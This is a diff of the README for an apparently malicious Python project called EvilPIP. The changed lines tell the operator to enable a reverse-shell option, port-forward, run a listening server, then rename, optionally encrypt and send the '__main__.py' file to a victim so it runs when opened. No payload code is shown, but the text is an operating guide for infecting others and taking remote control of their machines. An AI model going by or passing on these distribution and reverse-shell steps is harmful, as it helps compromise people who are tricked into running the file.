codeuk/EvilPIP/README.md

     Set 'buffer' to the buffer size (in bytes) that you want to send (optional) }
 ```
-If **REVSHELL** is enabled and you want the victim to connect to the reverse shell -
+If **REVSHELL** is enabled / you want the victim to connect to the reverse shell -

-    Port-Forward on the port you had chosen (look up a tutorial for your router/VPS)
+    If needed, port forward on the port you had chosen (look up a tutorial for your router/VPS)

 **When these steps are completed to your liking, you can move onto the distribution process**

 # Distribution methods 💾

-**If you set REVSHELL to True: Open 'server/server/server.py' on your own machine/VPS to wait for a reverse shell connection**
+**If you set REVSHELL to True: Open 'server/server/server.py' on your pc/server to listen for a connection**

-**Method 1: Sending file directly (only works if they have the dependencies)**
+**Method 1: Sending file directly (only works if they have python + the dependencies)**
 - Rename and encrypt (optional) the '__ main __.py' file
 - Send the file to someone directly and wait for a connection
 - When opened, evilpip should be executed